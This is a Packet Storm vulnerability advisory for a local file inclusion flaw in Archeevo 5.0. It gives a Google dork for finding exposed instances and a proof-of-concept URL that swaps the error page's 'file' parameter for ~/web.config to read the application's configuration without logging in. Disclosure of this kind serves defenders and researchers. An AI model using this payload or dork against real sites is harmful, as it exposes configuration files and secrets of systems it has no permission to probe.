Archeevo 5.0 Local File Inclusion ≈ Packet Storm

Home[1] Files[2] News[3] Contact[4] Add New[5]

Archeevo 5.0 Local File Inclusion[6]
Authored by Miguel Santareno[7]

Archeevo version 5.0 suffers from a local file inclusion vulnerability.

MD5 | d4916c25ed879d611b512e54a177db61

Change Mirror[11] Download[12]

        # Exploit Title: Archeevo 5.0 - Local File Inclusion
# Google Dork: intitle:"archeevo"
# Date: 01/15/2021
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.keep.pt/
# Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/
# Version: < 5.0
# Tested on: windows
# 1. Description
Unauthenticated user can exploit LFI vulnerability in file parameter.
# 2. Proof of Concept (PoC)
Access a page that don’t exist like /test.aspx and then you will be redirected to
https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
/web.config file of the application.
https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
# 3. Research:
https://miguelsantareno.github.io/MoD_1.pdf

Login[13] or Register[14] to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services[118]
Hosting By
Rokasec[119]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"